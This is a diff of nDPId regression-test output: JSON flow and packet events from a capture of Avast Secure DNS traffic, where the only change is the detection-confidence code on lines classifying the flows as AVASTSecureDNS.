-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477702850,"flow_last_seen":1625477702850,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477702850,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477702850,"flow_last_seen":1625477702850,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477702850,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1625477702968,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477702968,"pkt":"YDjgxTWgeJS0JASgCABFAADMurcAADERMfK11iOVwKgCZAG7wigAuFgK0x2BgAABAAEAAAAAATIJU0VDdXJFZG5TBUF2QXNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625413810414,"flow_last_seen":1625413810531,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625477702968,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625413810414,"flow_last_seen":1625413810531,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625477702968,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477738051,"flow_last_seen":1625477738051,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477738051,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1625477738051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477738051,"pkt":"eJS0JASgYDjgxTWgCABFAABD1LsAAH8RynbAqAJktdYjldgPAbsAL4PhWDEBAAABAAAAAAAAATIJc2VjdXJFZE5TBWF2YVN0A2NPbQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477738051,"flow_last_seen":1625477738051,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477738051,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477738051,"flow_last_seen":1625477738051,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477738051,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1625477738172,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477738172,"pkt":"YDjgxTWgeJS0JASgCABFAADMCxkAADER4ZC11iOVwKgCZAG72A8AuPxPWDGBgAABAAEAAAAAATIJc2VjdXJFZE5TBWF2YVN0A2NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477739836,"flow_last_seen":1625477739836,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477739836,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1625477739836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477739836,"pkt":"eJS0JASgYDjgxTWgCABFAABD1L8AAH8RynLAqAJktdYjldsvAbsAL1UmhCwBAAABAAAAAAAAATIJc0VjVXJlRG5TBWF2QVN0A2NPTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477739836,"flow_last_seen":1625477739836,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477739836,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477739836,"flow_last_seen":1625477739836,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477739836,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1625477739952,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477739952,"pkt":"YDjgxTWgeJS0JASgCABFAADMDM8AADIR3tq11iOVwKgCZAG72y8AuM2UhCyBgAABAAEAAAAAATIJc0VjVXJlRG5TBWF2QVN0A2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":37,"packets-processed":36,"total-skipped-flows":0,"total-l4-payload-len":3870,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":18,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":18,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":95,"global_ts_msec":1625482316411} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482316411,"flow_last_seen":1625482316411,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1625482316411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482316411,"pkt":"eJS0JASgYDjgxTWgCABFAABDyvUAAH8R1DzAqAJktdYjlfvuAbsAL4YFMq4BAAABAAAAAAAAATIJU2VDVVJFZE5zBWFWYXNUA0NvbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482316411,"flow_last_seen":1625482316411,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482316411,"flow_last_seen":1625482316411,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1625482316532,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482316532,"pkt":"YDjgxTWgeJS0JASgCABFAADMlTUAADMRVXS11iOVwKgCZAG7++4AuP5zMq6BgAABAAEAAAAAATIJU2VDVVJFZE5zBWFWYXNUA0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482318517,"flow_last_seen":1625482318517,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482318517,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1625482318517,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482318517,"pkt":"eJS0JASgYDjgxTWgCABFAABDyvkAAH8R1DjAqAJktdYjlcjXAbsALzxZb7EBAAABAAAAAAAAATIJU2VDdXJlRG5TBUFWQVN0A0NvbQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482318517,"flow_last_seen":1625482318517,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482318517,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482318517,"flow_last_seen":1625482318517,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482318517,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1625482318634,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482318634,"pkt":"YDjgxTWgeJS0JASgCABFAADMmQwAADIRUp211iOVwKgCZAG7yNcAuLTHb7GBgAABAAEAAAAAATIJU2VDdXJlRG5TBUFWQVN0A0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477738051,"flow_last_seen":1625477738172,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477702850,"flow_last_seen":1625477702968,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477697370,"flow_last_seen":1625477697487,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477739836,"flow_last_seen":1625477739952,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477700767,"flow_last_seen":1625477700884,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477738051,"flow_last_seen":1625477738172,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477702850,"flow_last_seen":1625477702968,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477697370,"flow_last_seen":1625477697487,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477739836,"flow_last_seen":1625477739952,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477700767,"flow_last_seen":1625477700884,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482396199,"flow_last_seen":1625482396199,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482396199,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1625482396199,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482396199,"pkt":"eJS0JASgYDjgxTWgCABFAABD9goAAH8RqSfAqAJktdYjlfkgAbsALyRTl04BAAABAAAAAAAAATIJc0VDdVJlZG5TBUFWQVN0A0NPbQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482396199,"flow_last_seen":1625482396199,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482396199,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482396199,"flow_last_seen":1625482396199,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482396199,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
